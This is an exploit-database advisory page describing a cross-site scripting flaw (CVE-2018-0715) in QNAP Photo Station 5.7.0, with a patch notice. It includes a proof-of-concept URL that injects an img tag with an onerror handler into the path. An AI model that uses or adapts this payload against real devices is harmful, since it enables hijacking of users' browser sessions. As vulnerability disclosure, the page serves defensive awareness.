header-logo
Suggest Exploit
vendor:
Photo Station
by:
Mitsuaki (Mitch) Shiraishi
6.1
CVSS
MEDIUM
Cross-Site Scripting
79
CWE
Product Name: Photo Station
Affected Version From: 5.7.0
Affected Version To: 5.7.0
Patch Exists: Yes
Related CWE: CVE-2018-0715
CPE: a:qnap:photo_station
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2018

QNAP Photo Station 5.7.0 – Cross-Site Scripting

QNAP Photo Station versions 5.7.0 and earlier are vulnerable to Cross-Site Scripting (XSS). An attacker can inject malicious JavaScript code into the application by sending a specially crafted URL to the vulnerable application. This code will be executed in the context of the user's browser, allowing the attacker to perform various malicious activities such as stealing cookies, hijacking the user's session, and redirecting the user to malicious websites.

Mitigation:

QNAP has released a patch to address this vulnerability. Users should update to the latest version of QNAP Photo Station.
Source

Exploit-DB raw data:

# Exploit Title: QNAP Photo Station 5.7.0 - Cross-Site Scripting
# Google Dork: N/A
# Date: 2018-09-07
# Exploit Author: Mitsuaki (Mitch) Shiraishi - secureworks
# Vendor Homepage: https://www.qnap.com/ja-jp/security-advisory/nas-201808-23
# Software Link: N/A
# Version: QNAP Photo Station versions 5.7.0 and earlier
# Tested on: N/A
# CVE : CVE-2018-0715

# PoC: 

https://***.***.***.***:8080/photo/abc/<img%20src%3Da.jpg%20onerror%3D%22alert(1)%22>.txt

Navigation

Suggest Exploit

Services By CQR